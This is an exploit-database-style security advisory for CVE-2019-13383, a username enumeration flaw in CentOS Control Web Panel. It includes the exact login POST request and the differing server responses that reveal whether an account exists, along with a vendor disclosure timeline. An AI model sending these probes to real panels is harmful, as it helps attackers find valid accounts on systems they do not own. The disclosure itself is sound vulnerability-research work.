# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message
# Date: 15 July 2019
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak
# Vendor Homepage: https://control-webpanel.com/changelog
# Software Link: Not available, user panel only available for lastest version
# Version: 0.9.8.836 to 0.9.8.847
# Tested on: CentOS 7.6.1810 (Core)
# CVE : CVE-2019-13383

# ====================================================================
# Information
# ====================================================================

Product     : CWP Control Web Panel
version     : 0.9.8.838
Fixed on    : 0.9.8.848
Test on     : CentOS 7.6.1810 (Core)
Reference   : https://control-webpanel.com/
CVE-Number  : 2019-13383



# ====================================================================
# Root course of the vulnerability
# ====================================================================
The server response different message between login with valid and invalid user.
This allows attackers to check whether a username is valid by reading the HTTP response.



# ====================================================================
# Steps to Reproduce
# ====================================================================

1. Login with a random user by using invalid password

POST /login/index.php?acc=validate HTTP/1.1
Host: 192.168.80.137:2083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
csrftoken: d41d8cd98f00b204e9800998ecf8427e
X-Requested-With: XMLHttpRequest
Content-Length: 30
Connection: close
Referer: https://192.168.80.137:2083/login/?acc=logon

username=AAA&password=c2Rmc2Rm



2. Check the HTTP response body

2.1 User does not exist (server response suspended)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:39:06 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 9

suspended


2.2 User does exist (server response nothing)

HTTP/1.1 200 OK
Server: cwpsrv
Date: Mon, 15 Jul 2019 01:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/7.0.32
Content-Length: 0



3. HTTP response body format depends on software version, but all of them keep responding differently as the example below

------------------------------------------------------------
|  Username  |   Password   |   Result                     |

------------------------------------------------------------
|  valid     |   valid      |   login success              |

|  valid     |   invalid    |  {"error":"failed"}         |

|  invalid   |   invalid    |  {"error":"user_invalid"}   |
------------------------------------------------------------



# ====================================================================
# PoC
# ====================================================================
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md



# ====================================================================
# Timeline
# ====================================================================
2019-07-06: Discovered the bug
2019-07-06: Reported to vendor
2019-07-06: Vender accepted the vulnerability
2019-07-11: The vulnerability has been fixed
2019-07-15: Published



# ====================================================================
# Discovered by
# ====================================================================
Pongtorn Angsuchotmetee
Nissana Sirijirakal
Narin Boonwasanarak